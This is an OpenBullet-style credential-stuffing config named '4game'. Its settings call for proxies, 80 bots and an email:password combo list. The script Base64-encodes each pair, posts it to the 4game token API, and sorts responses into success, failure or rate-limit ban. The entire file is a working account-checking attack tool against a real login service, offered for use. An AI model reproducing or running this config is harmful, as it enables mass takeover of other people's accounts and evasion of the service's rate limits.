[SETTINGS]
{
  "Name": "4game",
  "SuggestedBots": 80,
  "LastModified": "2018-06-16T13:24:59.9122968+00:00",
  "AdditionalInfo": "",
  "Author": "MaStErChO",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#ENCODE FUNCTION Base64Encode "<USER>:<PASS>" -> VAR "LOGIN" 
#Checking REQUEST POST "https://api2.4game.com/tokens" AutoRedirect=TRUE 
  CONTENT "{\"expiration\":\"long\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Authorization: basic <LOGIN>" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=FALSE 
  KEYCHAIN Ban OR 
    KEY "Too many requests. Rate limit exceeded!" 
  KEYCHAIN Success OR 
    KEY "\"userId\":\"" 
  KEYCHAIN Failure OR 
    KEY "User not found!" 
    KEY "Login error" 
